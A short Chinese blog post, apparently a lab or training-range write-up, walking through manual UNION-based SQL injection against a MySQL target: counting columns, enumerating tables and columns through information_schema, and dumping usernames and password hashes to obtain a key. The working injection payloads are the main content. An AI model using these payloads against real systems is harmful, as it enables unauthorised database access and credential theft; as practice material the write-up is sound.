SQL手工测试(MySQL数据库)

lubiii_2025-06-09 10:26

1.看到注入点,测试列字段数量,发现为4正常,为5出错,可知列数为5

2.找到数据库名mozhe_Discuz_StormGroup

3.查询表名?id=-1%20union%20select%201,2,group_concat(table_name),4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27

得到StormGroup_member,notice

4.查询列名

?id=-1%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27

5.获取数据

?id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member

mozhe\356f589a7df439f6f744ff19bb8092c0

此时发现直接输入会账密错误,说明需要解码

6.将密码解码得到的结果也是始终不正确,考虑其他数据

id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member%20limit%201,1

mozhe\89f76612d6fbbeb12265a7300301f024

7.再次解密验证

8.成功啦,获得Key:mozhe69c92e07d1330df9daeaeea8738

相关推荐
互联网搬砖老肖3 小时前
运维打铁: MongoDB 数据库集群搭建与管理
运维·数据库·mongodb
典学长编程3 小时前
数据库Oracle从入门到精通!第四天(并发、锁、视图)
数据库·oracle
积跬步,慕至千里4 小时前
clickhouse数据库表和doris数据库表迁移starrocks数据库时建表注意事项总结
数据库·clickhouse
极限实验室4 小时前
搭建持久化的 INFINI Console 与 Easysearch 容器环境
数据库
星辰离彬5 小时前
Java 与 MySQL 性能优化:Java应用中MySQL慢SQL诊断与优化实战
java·后端·sql·mysql·性能优化
白仑色5 小时前
Oracle PL/SQL 编程基础详解(从块结构到游标操作)
数据库·oracle·数据库开发·存储过程·plsql编程
程序猿小D6 小时前
[附源码+数据库+毕业论文]基于Spring+MyBatis+MySQL+Maven+jsp实现的个人财务管理系统,推荐!
java·数据库·mysql·spring·毕业论文·ssm框架·个人财务管理系统
独行soc7 小时前
2025年渗透测试面试题总结-2025年HW(护网面试) 33(题目+回答)
linux·科技·安全·网络安全·面试·职场和发展·护网
钢铁男儿7 小时前
C# 接口(什么是接口)
java·数据库·c#
花木偶8 小时前
【郑大二年级信安小学期】Day6:CTF密码学&杂项&工具包
安全·web安全·密码学
热门推荐
01集群聊天服务器---MySQL数据库的建立02Java学习第十五部分——MyBatis03Coze扣子平台完整体验和实践(附国内和国际版对比)04《深入设计模式》模式结构汇总05使用Ruby接入实时行情API教程06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07基于odoo17的设计模式详解---单例模式08基于odoo17的设计模式详解---装饰模式09DeepSeek各版本说明与优缺点分析10Everything文件检索工具 几秒检索几百G的文件